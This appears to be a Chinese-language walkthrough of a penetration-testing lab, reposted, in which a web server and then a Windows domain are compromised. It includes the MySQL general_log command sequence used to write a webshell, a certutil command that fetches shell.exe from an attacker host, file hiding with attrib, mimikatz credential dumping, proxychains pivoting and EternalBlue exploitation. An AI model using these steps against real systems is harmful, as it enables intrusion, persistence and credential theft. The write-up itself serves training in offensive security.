环境搭建:
最终效果为如此,web服务器可以ping通外网和内网两台服务器
外网打点
信息收集
发现端口:
80 http
3306 mysql
敏感目录:
/phpMyadmin
数据库弱口令 root root
通过日志功能getshell
现在咱们查询一下日志功能是否开启,默认是关闭的。
show variables like "general_log%";
开启日志功能
命令行 set globalgeneral_log='on';
图形化:
修改日志保存路径:
输入一句话木马并执行,使日志保存一句话木马。
拿到shell权限。
稳定权限
certutil -urlcache -split -f http://192.168.x.xxx/shell.exe
将文件设置为隐藏文件
** **attrib shell.exe +s +h
内网信息探测:
msf的马子让cs去接受。
可以看到cs这里已经成功上线
先提权:
可以看到已经多了一个system用户。
内网渗透
mimikatz****工具抓取本机用户名密码:
查看域下其他主机
回到msf
route查看路由表
结合cs获得的内网主机信息可以得到 内网的网段为 192.168.52.0/24
socks代理
加入路由表 (1是session值)route add 192.168.52.0 255.255.255.0 1
输出路由表信息 route print
run autoroute -s 10.10.10.0/24
(加入到路由表是搭建内网转发socks代理的前提之一)
使用代理模块
并设置参数
jobs一下查看到存在 jobs值便说明代理设置成功。
配置etc/proxychains4.conf
Proxychains +命令
**成功将kali的流量转发的内网中。 **
关一下防火墙
我这里直接就关了,如果没有成功可以提一下权到system
探测到内网主机138主机开放445端口
使用msf的永恒之蓝模块
余下的一台内网主机,如法炮制。
**至此整个目标域网络拿下。 **
版权归原作者 一个番茄锅 所有, 如有侵权,请联系我们删除。